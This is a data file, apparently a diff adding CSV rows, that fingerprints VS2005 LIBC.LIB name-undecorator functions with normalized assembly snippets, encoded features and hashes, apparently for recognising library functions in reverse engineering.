+??_5DName@@QAEAAV0@ABV0@@Z,"MOV R32,DWORD PTR DS:[R32+CONST]\nMOV R32,DWORD PTR DS:[R32+CONST]\nSHL R32,CONST\nSAR R32,CONST\nMOV R32,R32\nXOR R32,R32\nAND R32,CONST\nXOR R32,R32",JwfTE18iGcCdaudsXyIZwAAAAAAAAAAAnWrnbF8iGcAgce22IHHttl8iGcAAAAAA,[],917ace11eaf1994d16b91731623fcb93d6a26973,VS2005,LIBC.LIB
+?getOperatorName@UnDecorator@@CA?AVDName@@XZ,"PUSH CONST\nPOP R32\nMOVSX R32,BYTE PTR DS:[R32+CONST]\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH DWORD PTR DS:[R32*4+CONST]\nCALL CONST\nTEST R32,R32\nJCC CONST",u7ZcLC0SDB5y6DpFoy7VqtQ3kw0AAAAAcug6RUsbJei7tlws6wVlD/dmXi/n9S0cu7ZcLAf9iUG7tlws1DeTDQAAAAAAAAAAUDQ4vAf9iUE0nO3X6T4m79Q3kw0AAAAAu7ZcLAf9iUEtEgwe2E+Z2FA0OLxQNDi8DgBSHVA0OLxQNDi8NJzt1yTUqM8AAAAAJNSozzfULVMAAAAALRIMHuk+Ju8AAAAA1MwuWw4AUh2Ho219qBNKwAf9iUFINCO7UDQ4vPdmXi/joqt8h6NtfUsbJehO/QsU5/UtHO9SIeMAAAAASDQjuwAAAAAAAAAAu7ZcLAf9iUG7tlwsLRIMHrI3aEIAAAAATv0LFAf9iUG7tlws46KrfPdmXi8AAAAAu7ZcLCIuwKO7tlwssjdoQvdmXi+m5Vb/u7ZcLJNxRMNO/QsUu7ZcLAf9iUG7tlwsUDQ4vPdmXi+m5Vb/u7ZcLCIuwKMH/YlBSxsl6Ok+Ju8AAAAAB/2JQek+Ju8AAAAA6T4m79Q3kw0AAAAAIi7Ao+k+Ju8AAAAApuVW/+9SIeMAAAAATv0LFNhPmdghh3lj2N95CTSc7ddQNDi8IYd5Ywf9iUFO/QsUTv0LFA4AUh27tlwsk3FEw/dmXi/rBWUPu7ZcLAf9iUEmX686Jl+vOqgTSsAhh3ljTv0LFAf9iUEtEgweN9QtU6Mu1aoAAAAAA2tye079CxTUzC5b71Ih4/dmXi8AAAAALRIMHrI3aEIAAAAAIYd5Y9jfeQm7tlwsu7ZcLLu2XCy7tlws92ZeL6Mu1aoAAAAA,[],e2e41fe54701ede733e5556cf2350921a1d17880,VS2005,LIBC.LIB
+??4DName@@QAEAAV0@ABV0@@Z,"MOV R32,DWORD PTR SS:[ESP+CONST]\nMOV R32,DWORD PTR DS:[R32+CONST]\nSHL R32,CONST\nSAR R32,CONST\nXOR R32,R32\nAND R32,CONST\nXOR R32,R32\nMOV DWORD PTR DS:[R32+CONST],R32",u7ZcLF5htw8i35JfrcTpyyLfkl+7tlwsIt+SXwAAAAAAAAAAXmG3DwAAAAAAAAAA,[],2c5df3bf98f18bfbf2b737dad937fb3496474a04,VS2005,LIBC.LIB
+?length@charNode@@UBEHXZ,PUSH CONST\nPOP R32\nRETN,Ug74tAAAAAAAAAAA,[],2f36f0394335bfb419c5a1c6622d621de5032b51,VS2005,LIBC.LIB
+___unDName,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nXOR R32,R32\nCMP R32,R32\nJCC CONST",ZnkxNU6gi7EAAAAASlu0v06gi7EAAAAATm0NVkpbtL9meTE1TqCLsQAAAAAAAAAA,[],c9636c4881deeddbd671600bd31c4d1b58cf119c,VS2005,LIBC.LIB
+?getDataType@UnDecorator@@CA?AVDName@@PAV2@@Z,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nPUSH DWORD PTR SS:[EBP+CONST]\nLEA R32,DWORD PTR SS:[EBP+CONST]\nCALL CONST\nMOV R32,DWORD PTR DS:[0]\nMOV R8,BYTE PTR DS:[R32]",Joh6KH+aiSYAAAAAZti2hwAAAAAAAAAA2M0EpiTXN08miHooJNc3Tx2tG/KW3y9Uf5qJJqMu1aoAAAAAHa0b8qMu1aoAAAAA2M0Epr89yIXYzQSmQYNr3qMu1aoAAAAABO48AUGDa97YzQSmvz3IhX+aiSYAAAAAoy7VqmbYtocAAAAAlt8vVGbYtocAAAAA,[],be6d4ab9a8f8265f5eaebafec531a706da4731c8,VS2005,LIBC.LIB
+??4DName@@QAEAAV0@W4DNameStatus@@@Z,"AND R8,CONST\nPUSH CONST\nPUSH CONST\nMOV R32,0\nMOV DWORD PTR DS:[R32+CONST],R32\nCALL CONST\nTEST R32,R32\nJCC CONST",XyIZwAAAAAAAAAAAJu7hZaxBBg4AAAAA83qQtF8iGcCwSkZE25roj6xBBg4AAAAAu7ZcLF8iGcCtxMeTqBvUdfN6kLS7tlwsrcTHkybu4WXbmuiPQtQfE63Ex5O7tlwsrEEGDl8iGcAgczaYsEpGRF8iGcAAAAAAIHM2mF8iGcAAAAAAu7ZcLPN6kLRC1B8T,[],6bd8e95cc9363ecb3b4a70da5184bf29f3c9605c,VS2005,LIBC.LIB
+??0pDNameNode@@QAE@PAVDName@@@Z,"PUSH R32\nMOV R32,R32\nCALL CONST\nMOV R32,DWORD PTR SS:[ESP+CONST]\nMOV DWORD PTR DS:[R32],0\nTEST R32,R32\nJCC CONST",Ju7hZZb1VWgAAAAAx8uPJSbu4WW7tlwsMDtWbJb1VWjHy48lu7ZcLJb1VWgm7uFllvVVaAAAAAAAAAAA,[],5209e96d2c03e83a5313e784285faf7d126619de,VS2005,LIBC.LIB
+?length@DNameStatusNode@@UBEHXZ,"MOV R32,DWORD PTR DS:[R32+CONST]\nRETN",/zXMNQAAAAAAAAAA,[],96acfa69671b1374c0fc6b2da58913848e83d87f,VS2005,LIBC.LIB
+??HDName@@QBE?AV0@D@Z,"CALL CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nLEAVE\nRETN CONST",bj6cPgAAAAAAAAAA25ImXwAAAAAAAAAAblohxtuSJl831C1TN9QtU24+nD4AAAAA,[],4bed9d2f7fb50a9d43c1acccff6e841525e2c46d,VS2005,LIBC.LIB
+?getMemory@HeapManager@@QAEPAXIH@Z,"MOV R32,DWORD PTR SS:[ESP+CONST]\nPUSH R32\nPUSH R32\nPUSH R32\nLEA R32,DWORD PTR DS:[R32+CONST]\nMOV R32,R32\nAND R32,CONST\nCMP DWORD PTR SS:[ESP+CONST],0",cAEtka9DbFQAAAAAWFl2ny5Vuf4AAAAAQNM1IHLoOkU5S8BpkXnTfgAAAAAAAAAALlW5/hii4DG037QK4EVT+a9DbFQAAAAALlW5/uBFU/lwAS2RtN+0CinRhxANzMABr0NsVOLACb8AAAAAoDc6oXLoOkUAAAAAJu7hZXLoOkUAAAAAGKLgMeLACb8AAAAAcug6RQ3MwAEuVbn+KdGHECbu4WWgNzqhOUvAaZF5034AAAAA4sAJv5F5034AAAAAcug6RS5Vuf5YWXafDczAAZF5034AAAAA,[],03c79ba3eb5d27e1bc52118bbb1c1bbe6f103494,VS2005,LIBC.LIB
+?getDataIndirectType@UnDecorator@@CA?AVDName@@XZ,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nPUSH CONST\nLEA R32,DWORD PTR SS:[EBP+CONST]\nCALL CONST\nPUSH R32\nPUSH CONST",xMeLigAAAAAAAAAA,U+59xgAAAAAAAAAA,70ab10be1455cc0f227c8c8851e3e20135533cbb,VS2005,LIBC.LIB
+?getBasicDataType@UnDecorator@@CA?AVDName@@ABV2@@Z,"MOV R8,BYTE PTR DS:[R32]\nINC R32\nLEA R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR DS:[0],R32\nCALL CONST\nMOVZX R32,R8\nLEA R32,DWORD PTR DS:[R32+CONST]\nCMP R32,CONST",Tv0LFJ8KjEt7qn/hetHCtwBq0PUAAAAAzu9RHQBq0PUAAAAAe6p/4XYY6sZy6DpF71Ih458KjEsAAAAAcug6RXYY6sZy6DpFcug6RXYY6sZy6DpFpuVW/+9SIeMAAAAAcug6RXYY6saHo219h6NtfZ8KjEt2GOrGNRZyE3rRwrcAAAAAdhjqxu9SIeMAAAAAAGrQ9QAAAAAAAAAAuUKfns7vUR21KSWmC9vK/9hHjc41FnITnwqMS3rRwrdCwLyytSklpgvbyv81JVBZ2EeNzqblVv90fcoZQsC8snrRwrcAAAAANSVQWQAAAAAAAAAAdH3KGR2tG/KHo219h6NtfR2tG/KHo219Ha0b8u9SIeMAAAAAh6NtfR2tG/KHo219h6NtfR2tG/JO/QsU,[],42347c98aa03bcd6cc44911da22f21f738dc5304,VS2005,LIBC.LIB
+?getSymbolName@UnDecorator@@CA?AVDName@@XZ,"POP R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nLEAVE\nRETN",+kKYKgAAAAAAAAAAHCa6PvpCmCoAAAAAYxEC4vpCmCoAAAAAF80dXhwmuj5jEQLi,[],8366e1351299ec578328e7f53c2b7e8d68a80cbd,VS2005,LIBC.LIB
+?getDimension@UnDecorator@@CA?AVDName@@XZ,"MOVSX R32,BYTE PTR DS:[R32]\nSUB R32,CONST\nINC R32\nPUSH R32\nLEA R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR DS:[0],R32\nCALL CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]",nhq+UlvQFeAAAAAAW9AV4Cbu4WVb0BXggovX22bYtocAAAAAW9AV4Af9iUFb0BXgW9AV4Cbu4WW7966eB/2JQYKL19sAAAAAW9AV4OPSth/YzQSmJu7hZVvQFeAAAAAAoy7VqmbYtocAAAAAA9QWgVvQFeDWfO4M2M0EptZ87gxb0BXg49K2H6Mu1aoH/YlBZti2hwAAAAAAAAAAW9AV4Af9iUGeGr5Su/eunmbYtocAAAAA1nzuDIKL19sAAAAA,[],7cb1da46e1f8d580328a62d49f1c4afa192b3550,VS2005,LIBC.LIB
+?getPrimaryDataType@UnDecorator@@CA?AVDName@@ABV2@@Z,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nPUSH R32\nLEA R32,DWORD PTR SS:[EBP+CONST]\nCALL CONST\nMOV R32,DWORD PTR DS:[0]\nXOR R32,R32",zu9RHaMu1aoAAAAAl9p7lGH9m/umHQDyl9p7lIfxmVqX2nuUu7ZcLN1l/eyX2nuU9hfy4oFM0Fe7tlwsYf2b+6Mu1aoAAAAASln4t87vUR27tlwsoy7VqtQ3kw0AAAAAph0A8tQ3kw0AAAAA1DeTDQAAAAAAAAAAbfCnxvYX8uLYzQSmu7ZcLG3wp8a7tlws2M0EpqYdAPJLaA4Ph/GZWsSSpmgAAAAAS2gOD6Mu1aoAAAAAl9p7lHvLZZ68Qz7avEM+2mDBjFEAAAAAyS5CWGDBjFEAAAAAe8tlnt1l/eyQsFcLu7ZcLMkuQliX2nuUYMGMUaMu1aoAAAAAgUzQV8SSpmgAAAAAkLBXC91l/ewAAAAAxJKmaKMu1aoAAAAA3WX97KMu1aoAAAAA,[],3e1c9ddeb9220db9e1df7e4e0e05cdf9ff65a8a4,VS2005,LIBC.LIB
+??4DName@@QAEAAV0@PAV0@@Z,"AND R8,CONST\nPUSH CONST\nPUSH CONST\nMOV R32,0\nMOV DWORD PTR DS:[R32+CONST],R32\nCALL CONST\nTEST R32,R32\nJCC CONST",LJzyLKxBBg4AAAAAxm0L8ID9In4AAAAAzSwRpsZtC/CtxMeTrcTHkybu4WUsnPIsgP0ifgAAAAAAAAAAJu7hZaxBBg4AAAAArEEGDoD9In4gczaYRc2hls0sEaa7tlwsIHM2mID9In4AAAAAu7ZcLID9In7NLBGm,[],1c74ccd6b52c13ee20a241bdf8ef2dceed200344,VS2005,LIBC.LIB
+?getZName@UnDecorator@@CA?AVDName@@XZ,"DEC R32\nXOR R32,R32\nMOV DWORD PTR DS:[0],R32\nCMP BYTE PTR DS:[R32],R8\nSETE R8\nINC R32\nPUSH R32\nLEA R32,DWORD PTR SS:[EBP+CONST]",u7ZcLJqcl0WNlzq1a4RJY/dmXi8cJro+jZc6tSiX6GwAAAAA1clspfdmXi8cJro+/4XnPmuESWO+LokqHCa6PvdmXi8AAAAA080hSpqcl0W7tlwsvi6JKmuESWMAAAAA92ZeLyiX6GwAAAAAKJfobAAAAAAAAAAAmpyXRdXJbKX/hec+,[],7699e68bb0dee9b0a653517f40f94ee14437e822,VS2005,LIBC.LIB
+??0Replicator@@QAE@XZ,"PUSH R32\nMOV R32,R32\nPUSH CONST\nLEA R32,DWORD PTR DS:[R32+CONST]\nCALL CONST\nPUSH CONST\nLEA R32,DWORD PTR DS:[R32+CONST]\nCALL CONST",Y/GS8wAAAAAAAAAA,u7ZcLCbu4WUNzMABDczAAWa99zkAAAAASqArJF8iGcAAAAAAJu7hZWa99zkAAAAAZr33OSbu4WXbmuiP25rojxspN2sAAAAAXyIZwAAAAAAAAAAAqBvUdSbu4WW7tlwsJu7hZRspN2sAAAAAGyk3a18iGcBKoCsk,bb5e9836f514408f6a94aef0661312528f253c13,VS2005,LIBC.LIB
+??0DName@@QAE@ABV0@@Z,"PUSH R32\nMOV R32,DWORD PTR SS:[ESP+CONST]\nMOV R32,R32\nMOV R32,DWORD PTR DS:[R32+CONST]\nMOV R32,DWORD PTR DS:[R32+CONST]\nSHL R32,CONST\nSAR R32,CONST\nXOR R32,R32",s18gBgAAAAAAAAAA,[],5da88ecfc7338e5cf47b40041014105f423db0be,VS2005,LIBC.LIB
+??4DName@@QAEAAV0@D@Z,"PUSH R32\nMOV R32,R32\nLEA R32,DWORD PTR SS:[ESP+CONST]\nPUSH CONST\nAND DWORD PTR DS:[R32+CONST],CONST\nPUSH R32\nCALL CONST\nMOV R32,R32",mYN9DAAAAAAAAAAA,gfFwJCbu4WUGXpTExJ0axrYU/3IAAAAAgfFwJCbu4WUz4fNNQUXQGwDza+wAAAAABl6UxKxBBg4AAAAAAPNr7Chdv6sAAAAAFjgIIkvTtWkWOAgiS9O1aShdv6sAAAAAFjgIIkvTtWm7tlwsKF2/q7YU/3IAAAAAM+HzTaxBBg4AAAAAu7ZcLLYU/3LfE8DlthT/cgAAAAAAAAAAu7ZcLADza+zcBh2r3xPA5RY4CCLEnRrGrEEGDrYU/3JBRdAbJu7hZaxBBg4AAAAA3AYdq4HxcCSB8XAk4XJA3bYU/3K7tlws,bc8d3becd92963dfca69a491b7ae027df2bc5789,VS2005,LIBC.LIB
+??0DName@@QAE@K@Z,"PUSH CONST\nMOV R32,R32\nXOR R32,R32\nPOP R32\nDIV R32\nDEC R32\nPUSH R32\nMOV R32,R32",g8xbW4PMW1uqXcloATI+goPMW1sAAAAAql3JaAAAAAAAAAAA,[],87382a7e5afd0eec2dff1a7cf8629758fe0f4a93,VS2005,LIBC.LIB
+?getScope@UnDecorator@@CA?AVDName@@XZ,"POP R32\nMOV R32,R32\nCALL CONST\nPUSH R32\nLEA R32,DWORD PTR SS:[EBP+CONST]\nCALL CONST\nTEST BYTE PTR SS:[EBP+CONST],CONST\nJCC CONST",9+mc8sfe2pgAAAAA+QI/b5exKTkAAAAAAmtO4vaBHB6Q0xuvXTyiNEagNKgswvi+Y09DUtjOmHddPKI0IaBcQVr2v9kAAAAAQF4LpF/jIP8AAAAARqA0qAPKSyb2gRweu7NRpQAAAAAAAAAAl7EpOQPKSyb2gRweBOg3vdJEIioAAAAAx97amAPKSyb2gRweWva/2QPKSyb2gRwekNMbr/aBHB4thlOeA8pLJvaBHB4thlOeopxREAPKSyb2gRweX+Mg/9JEIioAAAAAIOhvPNJEIioAAAAAW9AV4Cp6LtGJo0OOLYZTnvaBHB5QNDi82M6Yd0agNKgswvi+iaNDjomjQ44qei7R9oEcHlA0OLzYzQSmUDQ4vNjOmHdjT0NSKnou0aKcURAAAAAALML4vvkCP29ikSys2M0EpruzUaUPRajzD0Wo87uzUaUAAAAAl0qdgLuzUaUAAAAAUDQ4vFG8k1LWfO4MFaIxViDobzwhoFxBYpEsrFvQFeC7tlwsu7ZcLBWiMVa7tlws1nzuDJdKnYAAAAAAu7ZcLAToN70VojFWUbyTUruzUaUAAAAAFaIxVkBeC6T36Zzy0kQiKgPKSyb2gRwe,[],7a3790d021e9a45d2296b8854cc22bea04e8c477,VS2005,LIBC.LIB
+?isEmpty@DName@@QBEHXZ,PUSH CONST\nPOP R32\nRETN,Ug74tAAAAAAAAAAAUmjqW1IO+LRSzjaVUs42lQAAAAAAAAAA3xPA5VIO+LRSaOpb,[],7765dbfe787bd1127347afd7d3ebda346f678d05,VS2005,LIBC.LIB
+?getDecoratedName@UnDecorator@@CA?AVDName@@XZ,"PUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nCALL CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPOP R32\nLEAVE\nRETN",5b/5gtQ3kw0AAAAAhTb5AfaBHB560cK32M0EpmW7ZOvWfO4M1nzuDEkDyrkAAAAAcug6RVA0OLxQNDi8Zbtk6wAAAAAAAAAASQPKuQAAAAAAAAAAUDQ4vFA0OLzFJ+8t1DeTDQAAAAAAAAAAxSfvLXrRwrf2gRweUDQ4vHrRwrf2gRwe9oEcHvtzeqTYzQSmetHCt+W/+YIAAAAAPK3DhgPKSyY4z5Vu9oEcHnLoOkXYzQSm2M0EptZ87gzYzQSm2M0EpvtzeqRP5PMiT+TzIl7iw9Jy6DpF2M0EpnLoOkULcZXBC3GVwXLoOkUPLUex+3N6pF7iw9Jy6DpFcug6RV7iw9Lhej+tOM+VbuW/+YIAAAAA4Xo/rXrRwrcAAAAADy1HsVA0OLxQNDi8XuLD0tQ3kw0AAAAAA8pLJtjNBKaFNvkB,[],272f64c63aad9f388bbb461bfb55898025bb53ce,VS2005,LIBC.LIB
+??0DName@@QAE@XZ,"MOV R32,R32\nAND DWORD PTR DS:[R32],0\nAND DWORD PTR DS:[R32+CONST],CONST\nRETN",U+59xgAAAAAAAAAA,[],0a49e67f5fa3d61a0854d4d96e655c1c5154eb50,VS2005,LIBC.LIB
+??0DName@@QAE@D@Z,"PUSH R32\nMOV R32,R32\nAND DWORD PTR DS:[R32+CONST],CONST\nAND DWORD PTR DS:[R32],0\nCMP BYTE PTR SS:[ESP+CONST],0\nJCC CONST",ggoPFYD9In7HyDzPx8g8z4D9In4AAAAAgP0ifgAAAAAAAAAA,[],3c322ec82ca5ea02d02408f377c3e3ef2939ff14,VS2005,LIBC.LIB
+?getString@DNameStatusNode@@UBEPADPADH@Z,"PUSH R32\nPUSH CONST\nPUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nADD ESP,CONST",Ju7hZffAU94AAAAA98BT3va63KHf6hBM9rrcoQAAAAAAAAAA3+oQTPa63KFy6DpFcug6Rfa63KFM9mnKTPZpyva63KEAAAAA21puMvfAU94m7uFl,[],200a5bfad6ecae4c06facf515f732e9f05d015ab,VS2005,LIBC.LIB
+?getThrowTypes@UnDecorator@@CA?AVDName@@XZ,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV R32,DWORD PTR DS:[0]\nMOV R8,BYTE PTR DS:[R32]\nTEST R8,R8\nJCC CONST",2M0EprsEJ+oKPjdlCj43ZSiX6GwAAAAA5UKtfcGM7u8AAAAAwYzu7yiX6GwAAAAAXr4vVOVCrX3YzQSmKJfobAAAAAAAAAAAuwQn6sGM7u8AAAAA,[],9a8f90291ef3a6ef771317a53279a352d377f303,VS2005,LIBC.LIB
+?Destructor@HeapManager@@QAEXXZ,"MOV R32,DWORD PTR DS:[R32]\nPUSH DWORD PTR DS:[R32+CONST]\nMOV DWORD PTR DS:[R32+CONST],R32\nCALL DWORD PTR DS:[R32+CONST]\nPOP R32\nJMP SHORT CONST",AOHWawAAAAAAAAAAHQXwAADh1msz+6h3M/uodx0F8AAAAAAAcMiU5ADh1msdBfAA,[],47227b12615eade29eb2ada95277ebb19acd09ba,VS2005,LIBC.LIB
+?getArrayType@UnDecorator@@CA?AVDName@@ABV2@@Z,"POP R32\nPOP R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPOP R32\nLEAVE",YFWldACr/kyfCoxL9MBIhyGHeWPkUryfAKv+TACr/kyfCoxLu9ePnAAAAAAAAAAAnwqMSw0ujENHfLIMUwhHd58KjEv0wEiHcPAUxXt90FgAAAAA5FK8n2BVpXTK3xkVnwqMS3DwFMUGKBJkIYd5Y2BVpXTK3xkVyt8ZFXt90FgAAAAAe33QWLvXj5wAAAAAR3yyDLvXj5wAAAAABigSZHt90FgAAAAADS6MQ7vXj5wAAAAA,[],db532b2c77a4faeb08e6b9c0f151e6faed5bbe02,VS2005,LIBC.LIB
+?length@pDNameNode@@UBEHXZ,"MOV R32,DWORD PTR DS:[R32+CONST]\nTEST R32,R32\nJCC CONST",Us42lQAAAAAAAAAAaNbbxwAAAAAAAAAALlW5/lLONpVo1tvH,[],f807fe8178b703c35572fa0f6ecfc472d355322f,VS2005,LIBC.LIB
+??HDName@@QBE?AV0@PBD@Z,"MOV R32,DWORD PTR SS:[EBP+CONST]\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nLEAVE\nRETN CONST",wYzu724+nD4AAAAAblohxsGM7u831C1Tbj6cPgAAAAAAAAAAN9QtU24+nD4AAAAA,[],10ed03f27e98e0d5f036dfa7b9fdd3fa07922c02,VS2005,LIBC.LIB
+?getPtrRefType@UnDecorator@@CA?AVDName@@ABV2@0H@Z,"PUSH CONST\nLEA R32,DWORD PTR SS:[EBP+CONST]\nCALL CONST\nCMP DWORD PTR SS:[EBP+CONST],0\nLEA R32,DWORD PTR SS:[EBP+CONST]\nSETE R8\nDEC R32\nAND R32,CONST",iAaz4/dmXi8AAAAACHkw/a75bqXvUiHjJw91Egh5MP2IBrPj2M0EptjNBKbYzQSmi27ycCiX6GwAAAAA1p1GZZ8KjEuIBrPjrvlupQAAAAAAAAAAiAaz4wh5MP0AAAAAnwqMS4gGs+OQsFcL92ZeLyiX6GwAAAAA2M0Epotu8nBOKv2uKJfobAAAAAAAAAAAq/V4bNadRmXYzQSmTir9rgh5MP0IeTD92M0Epk4q/a7YzQSmiAaz458KjEsAAAAA71Ih4675bqUAAAAAkLBXC4gGs+MAAAAACHkw/YgGs+MnD3USnwqMS/dmXi+fCoxL,[],4bbf72a6a017b84c2d28d7fbf0cbc6da7dc3809d,VS2005,LIBC.LIB
+?getCallingConvention@UnDecorator@@CA?AVDName@@XZ,"LEA R32,DWORD PTR SS:[EBP+CONST]\nCALL CONST\nMOV R32,DWORD PTR DS:[0]\nPUSH CONST\nNOT R32\nPOP R32\nTEST R8,R8\nJCC CONST",cug6RdZ87gxy6DpFPceADLf2yqAAAAAA1nzuDEkDyrkAAAAA8CngBdQ3kw0AAAAA1nzuDLf2yqAAAAAAt/bKoNQ3kw0AAAAAZbtk6wAAAAAAAAAAcug6RdZ87gy7tlwsSQPKuQAAAAAAAAAA1nzuDLf2yqAAAAAAYRzFmdZ87gzMfT0lu7ZcLOwVZmTWfO4M1DeTDQAAAAAAAAAA1nzuDLf2yqAAAAAAqBNKwPAp4AVy6DpF7BVmZNQ3kw0AAAAA1nzuDLf2yqAAAAAAPRonqWW7ZOthHMWZcug6RT3HgAxy6DpFzH09JewVZmSoE0rAcug6RdZ87gxy6DpF,[],d5d70aa03b292063697277919a76d0387f40d510,VS2005,LIBC.LIB
+?getArgumentTypes@UnDecorator@@CA?AVDName@@XZ,"INC DWORD PTR DS:[0]\nLEA R32,DWORD PTR SS:[EBP+CONST]\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nJMP SHORT CONST",5b/5gmbYtocAAAAA4oRyd1AloPskYUlkEaaohWbYtocAAAAAJGFJZLxIm5n2gRwe2M0EprnjxVzYzQSmZti2hwAAAAAAAAAAUCWg+xGmqIUAAAAA080hSnoPRxHihHJ3zajxxmbYtocAAAAA2M0EprDhjK/NqPHGuePFXGbYtocAAAAAeg9HERGmqIUAAAAAvEibmWbYtocAAAAAsOGMr+W/+YIAAAAA9oEcHrxIm5nYzQSm,[],0afdd433fb9a62b3c7a4836096f65ddde2f3bdac,VS2005,LIBC.LIB
+??YDName@@QAEAAV0@ABV0@@Z,"MOV R32,DWORD PTR DS:[R32+CONST]\nMOV R32,R32\nSHL R32,CONST\nSAR R32,CONST\nPUSH R32\nCALL CONST\nJMP SHORT CONST",UaffYxkt4OHR2jWbXyIZwAAAAAAAAAAAPRccBAh5MP0KH3XQCHkw/VGn32PbmuiP0do1m18iGcAAAAAACh910F8iGcAAAAAA25roj18iGcAAAAAAGS3g4QAAAAAAAAAA,[],a2e29f4867cc637e3cf50bb96cb0ac5f85ced74e,VS2005,LIBC.LIB
+?isUDC@DName@@QBEHXZ,"PUSH R32\nMOV R32,R32\nCALL CONST\nTEST R32,R32\nJCC CONST",T4vMCgAAAAAAAAAAWn1BPk+LzAonD3UStG2SEQAAAAAAAAAAJw91Ek+LzAq0bZIR,[],3df7ecfaa5c64e9b1f70e72aaa51c7b9f29ac839,VS2005,LIBC.LIB
+?getSignedDimension@UnDecorator@@CA?AVDName@@XZ,"INC DWORD PTR DS:[0]\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nPOP R32\nPUSH R32\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32",oy7VqmbYtocAAAAAXr4vVNjNBKbNqPHGyAwNI6Mu1aoAAAAAZti2hwAAAAAAAAAAzajxxmbYtocAAAAAhyEP7qMu1aoAAAAA2M0EpochD+7IDA0j,[],ce38c1b5ec6f4198a2607c810ba4e116120330f5,VS2005,LIBC.LIB
+??HDName@@QBE?AV0@ABV0@@Z,"MOV R32,DWORD PTR SS:[EBP+CONST]\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPOP R32\nLEAVE\nRETN CONST",yWC+c+9SIePTQr6o71Ih4xN3qCMAAAAAE3eoIwAAAAAAAAAA00K+qBN3qCMAAAAA7/56yxN3qCMAAAAAJ0Bi/MlgvnPv/nrL,[],39fe575439867d5df53a42a853eb8c57bfee26b0,VS2005,LIBC.LIB
+??HDName@@QBE?AV0@PAV0@@Z,"MOV R32,DWORD PTR SS:[EBP+CONST]\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nLEAVE\nRETN CONST",bj6cPgAAAAAAAAAAN9QtU24+nD4AAAAAwYzu724+nD4AAAAAblohxsGM7u831C1T,[],404548ce61b3bcf1bd88797f7a2f5c8cf2db7f6c,VS2005,LIBC.LIB
+?UScore@UnDecorator@@SAPBDW4Tokens@@@Z,"MOV R32,DWORD PTR DS:[0]\nNOT R32\nTEST R8,CONST\nMOV R32,DWORD PTR SS:[ESP+CONST]\nMOV R32,DWORD PTR DS:[R32*4]\nJCC CONST",wqJ+pwAAAAAAAAAAHplG5wGhdbPCon6nAaF1swAAAAAAAAAA,[],3f13426b228d359999d380f8a2eafb7d450e529d,VS2005,LIBC.LIB
+?getPtrRefDataType@UnDecorator@@CA?AVDName@@ABV2@H@Z,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV R32,DWORD PTR DS:[0]\nMOV R8,BYTE PTR DS:[R32]\nTEST R8,R8\nJCC CONST",KJfobAAAAAAAAAAA2M0EptjNBKZSJLaOZti2hwAAAAAAAAAAUiS2joJHurb9at5gnIZRONjNBKbYzQSmORna3WDBjFEAAAAAgke6tiiX6GwAAAAAXr4vVM7vUR2chlE4/WreYGbYtocAAAAA2M0EpjkZ2t0CKQdAYMGMUSiX6GwAAAAAAikHQGDBjFEAAAAAzu9RHSiX6GwAAAAA,[],7691af702300dcd7651c0c6f48c0e3d9c4758e7d,VS2005,LIBC.LIB
+?composeDeclaration@UnDecorator@@CA?AVDName@@ABV2@@Z,"MOV R32,DWORD PTR SS:[EBP+CONST]\nXOR R32,R32\nCMP R32,CONST\nSETE R8\nNEG R32\nSBB R32,R32\nTEST R32,R32\nJCC CONST",l3FRnnLoOkUAAAAAwl8HpxY4CCIWOAgi5FK8n1wpEN4p0ZsJcug6RVwpEN4p0ZsJzNIUMhY4CCIAAAAAKdGbCR2tG/JJUZ21FjgIImvI/3abdkbbaWLf1TcUUJ/VAD0em3ZG22Gv0C0AAAAAapbKqYHxcCSOuooVp/1VT6Mu1aoAAAAAa8j/dh9iKKEfYiihYa/QLR9iKKEfYiihSVGdtVwpEN4drRvyR1Bb/4HxcCSOuooVH2IooWvI/3ahSY0Vwl8HpxY4CCKHo219h6Ntfaokx1o1ArZroUmNFQe2M6YAAAAAjrqKFYuKeXo1FnITHa0b8hd4Mn8AAAAANQK2a3LoOkXneWJPa8j/dh9iKKF2GOrGNxRQn6CXXGzYzQSm53liT6Mu1aoAAAAAB7Yzph9iKKF2GOrGdhjqxl2epScAAAAA2M0EpszSFDJ1OhzFdTocxRd4Mn8AAAAAEWQzg6niRcwAAAAAXCkQ3mJnSBzu3iuI+5pNEVjaKDqmHQDycug6Raokx1o1ArZrNQK2a3LoOkUpJq1VF3gyf2JnSBzu3iuITv+f3RY4CCIAAAAAKSatVaMu1aoAAAAAcug6RRY4CCJwxmKzNRZyE/dmXi8AAAAAH2IooWGv0C2bdkbbgfFwJBQWo/xSEUUVm3ZG2yaeXZIAAAAA7t4riIejbX0AAAAAYa/QLR9iKKEfYiihJp5dkh9iKKEfYiih5FK8n3LoOkVy6DpFUhFFF